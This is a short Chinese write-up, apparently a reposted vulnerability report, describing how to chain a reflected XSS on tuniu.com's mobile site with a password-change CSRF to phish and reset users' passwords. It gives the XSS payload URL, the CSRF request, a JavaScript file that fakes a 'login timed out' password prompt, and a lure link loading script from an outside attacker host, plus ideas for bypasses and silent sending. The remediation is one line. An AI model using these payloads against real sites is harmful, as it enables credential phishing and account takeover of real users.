记得某次面试时候说起这个利用,但是面试官觉得不可行。我觉得居然用户能被X也应该有可能被钓,还是有可行性的。
1.某处XSS:http://m.tuniu.com/?action=route&id=329846&pdate=<ScRiPt >prompt(/xss/)</ScRiPt>&todo=index
2.修改密码处CSRF:http://www.tuniu.com/main.php?do=user_do_change_password&old=123456&new=password&pwd_s=1
3.创建外部JS:
var pass;
pass=prompt("登陆超时,请重新输入您的密码","password");
url="http://www.tuniu.com/main.php?do=user_do_change_password&new=password&pwd_s=1&old="+pass;
window.location=url;
4.诱使用户访问
http://m.tuniu.com/?action=route&id=329846&pdate=<ScRiPt/src=//www.your-site.com/1.js></ScRiPt>&todo=index
若用户输入其正确密码,JS内CSRF将会将其密码重置。
1表示重置成功,0表示重置失败。
感觉还可以结合一些XSSbypass。
使用其他window弹窗使用户输入密码密文*。
location跳转也可以改得成其他静默发送?
修复方案:
修复XSS和CSRF。。。
查看更多关于途牛网XSS+CSRF钓鱼式重置用户密码 - 网站安全 -的详细内容...